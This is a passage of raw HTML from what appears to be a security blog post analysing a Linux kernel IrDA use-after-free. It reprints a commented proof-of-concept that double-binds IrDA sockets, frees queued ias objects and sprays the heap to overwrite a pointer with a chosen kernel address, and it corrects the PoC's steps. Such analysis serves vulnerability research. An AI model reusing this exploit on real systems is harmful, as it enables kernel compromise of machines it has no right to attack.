class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f378462779655-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f378462779655-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">goto<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f378462779655-6\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>In the PoC, binding socket 1 twice would simply leave the first allocated object in the queue and set self-&gt;ias_obj (for socket 1) to NULL.<\/p>\n<p>The exploitation procedure detailed before in this post is different from the actual PoC:<br \/> &#8211; Create 4 socket files via socket()<br \/> &#8211; bind socket 1 to 3 , this will allocate and insert objects into irias_objects<br \/> &#8211; bind 1 again , this will trigger the first bug<br \/> &#8211; insert socket 2 &amp; 3 many times (~5)<br \/> &#8211; close socket 2, then 3 , this will free sockets and you should see the ias object of socket 3 freed but still queued in the list [!]<br \/> &#8211; Spray the heap to fill the freed object with our payload, now we have control over obj-&gt;q.q_(next\/prev)<br \/> &#8211; bind socket 4 , this is \u2018what\u2019 pointer to put in the controlled object (obj-&gt;q.q_prev)<br \/> &#8211; close socket 4 to free the last object<br \/> &#8211; Spray the heap again to control the object<br \/> &#8211; Trigger the overwritten pointer , and you\u2019ll get RIP<\/p>\n<p>[!] step is different from the PoC which closes sock 3 first and then sock 2. That makes a big difference. Closing sock 2 first would leave a single obj_ias for sock 3 in the queue (links to sock 1 object will be lost). This will not lead to an exploitable UAF case.<\/p>\n<p>Reinserting ias_obj for sock 2 &amp; 3 many times (~5) is not needed. You&#8217;re repeating the same operations without affecting the queue layout. To make the whole process clearer here&#8217;s the original PoC with comments:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f37f374049301\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> fd1 = socket(0x17,0x5,0);  fd2 = socket(0x17,0x5,0);  fd3 = socket(0x17,0x5,0);  fd4 = socket(0x17,0x5,0);    \/* create namespace for xfrm   * this is not required to trigger the bug  *\/  create_ns();    irda_bind(fd1,4,0x4a,0x3,&#8221;c&#8221;);    int i;    irda_bind(fd2,4,0x4b,0x3,&#8221;c&#8221;);  irda_bind(fd3,4,0x4c,0x3,&#8221;c&#8221;);  \/* at this point there&#8217;re 3 objects in the queue. refer to fig1 for the queue  * layout*\/    irda_bind(fd1,4,0x4a,0x3,&#8221;c&#8221;);  \/* binding s1 again reults in self-&gt;ias-&gt;obj (for s1) being set to NULL.  * However, it does not affect the layout of the queue! *\/      \/* repeated reinsertion of sock 2 and 3 objects 5 times doesn&#8217;t make any sense.  * These operations are redundant. It&#8217;s only needed to reinsert 2 and 3 once.  * see fig2 for the queue layout after reinserting ias_obj for sock 2 and fig3  * for after reinserting ias_obj for sock 3. *\/  for(i=0;i&lt;5;i++) {  \/* 0x00 means that it takes self-&gt;ias_obj *\/  irda_set_ias(fd2,&#8221;x00&#8243;);  irda_set_ias(fd3,&#8221;x00&#8243;);  }    \/* Again, closing sock 1 has no effect on the queue layout. The reference to  * the sock 1 object is lost because of the double bind earlier *\/  close(fd1);    \/* Trace dequeue_general() and you should get the queue layout in fig4 *\/  close(fd3);    \/* annoying the queue and free the first queued object*\/  printf(&#8220;[+] Freeing the first queued ias object n&#8221;);    \/* THIS IS WHERE THE FIRST UAF HAPPENS. You&#8217;re overwriting the q_prev ptr in  * the freed sock 3 object with the address of the sock 1 object. Trace  * dequeue_general() again *\/  close(fd2);    \/\/getchar();  sleep(1);  \/* By the time you start the spray, the q_prev ptr in the sock 3 object is  * already overwritten. In some cases you get lucky and there&#8217;s no object  * allocated where sock 3 object was, so you&#8217;re overwriting bytes 8 to 16 of  * some unallocated object. If this was q_next for example, then you&#8217;d be  * overwriting the freelist ptr and corrupting the slab.    * Note that when you get &#8220;unlucky&#8221; and some object is already allocated at the  * sock 3 object address, you&#8217;re overwriting bytes 8 to 16 of that object with  * address of sock 1 obj.  *\/    \/* If the target object is still not allocated at this point, the spray would  * reset q_prev value to the target address (e.g., 0xdeadbeef in the example).  *\/  unsigned char *buf = malloc(4096);  pid_t pid;  u_int64_t addr = 0xffffffff81f01500;  addr = 0xffffffff81efeb60;  \/\/addr = 0xdeadbeef;  addr = target_addr;  void *x = &amp;addr;  memset(buf,0xcc,88);  *(void **)(buf+8) = (void*)addr;    printf(&#8220;[+] Spray memory and take control of the old freed objectn&#8221;);  spray_heap(buf,88,200);  usleep(10000);    printf(&#8220;[+] Allocating new object to overwrite the targetted pointern&#8221;);    \/* Now inserting sock 4 obj would trigger your first oops message on  * dereferencing q_prev (0xdeadbeef) on the enqueue_first() path  * (*queue)-&gt;q_prev-&gt;q_next = element  *  * where queue head is pointing to the sprayed object.  *  * The rest is not relevant.  *\/  irda_bind(fd4,4,0&#215;30,0x3,&#8221;c&#8221;);  printf(&#8220;[+] Freeing object again n&#8221;);  close(fd4);  sleep(1);  printf(&#8220;[+] Fill the last object with payload n&#8221;);  memset(buf,0xcc,88);  spray_heap(buf,88,200);    usleep(1000);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f37f374049301-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f37f374049301-98\">98<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-1\"><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-2\"><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-3\"><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-4\"><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-6\"><span class=\"crayon-c\">\/* create namespace for xfrm <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-7\"><span class=\"crayon-c\">* this is not required to trigger the bug<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-8\"><span class=\"crayon-c\">*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-9\"><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-11\"><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-13\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-15\"><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-16\"><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-17\"><span class=\"crayon-c\">\/* at this point there&#8217;re 3 objects in the queue. refer to fig1 for the queue<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-18\"><span class=\"crayon-c\">* layout*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-20\"><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-21\"><span class=\"crayon-c\">\/* binding s1 again reults in self-&gt;ias-&gt;obj (for s1) being set to NULL.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-22\"><span class=\"crayon-c\">* However, it does not affect the layout of the queue! *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-25\"><span class=\"crayon-c\">\/* repeated reinsertion of sock 2 and 3 objects 5 times doesn&#8217;t make any sense.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-26\"><span class=\"crayon-c\">* These operations are redundant. It&#8217;s only needed to reinsert 2 and 3 once.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-27\"><span class=\"crayon-c\">* see fig2 for the queue layout after reinserting ias_obj for sock 2 and fig3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-28\"><span class=\"crayon-c\">* for after reinserting ias_obj for sock 3. *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-29\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-30\"><span class=\"crayon-c\">\/* 0x00 means that it takes self-&gt;ias_obj *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-31\"><span class=\"crayon-e\">irda_set_ias<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-32\"><span class=\"crayon-e\">irda_set_ias<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-33\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-35\"><span class=\"crayon-c\">\/* Again, closing sock 1 has no effect on the queue layout. The reference to<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-36\"><span class=\"crayon-c\">* the sock 1 object is lost because of the double bind earlier *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-37\"><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-39\"><span class=\"crayon-c\">\/* Trace dequeue_general() and you should get the queue layout in fig4 *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-40\"><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-42\"><span class=\"crayon-c\">\/* annoying the queue and free the first queued object*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-43\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Freeing the first queued ias object n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-45\"><span class=\"crayon-c\">\/* THIS IS WHERE THE FIRST UAF HAPPENS. You&#8217;re overwriting the q_prev ptr in<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-46\"><span class=\"crayon-c\">* the freed sock 3 object with the address of the sock 1 object. Trace<\/span><\/div>\n<div class=\"crayon-line\" 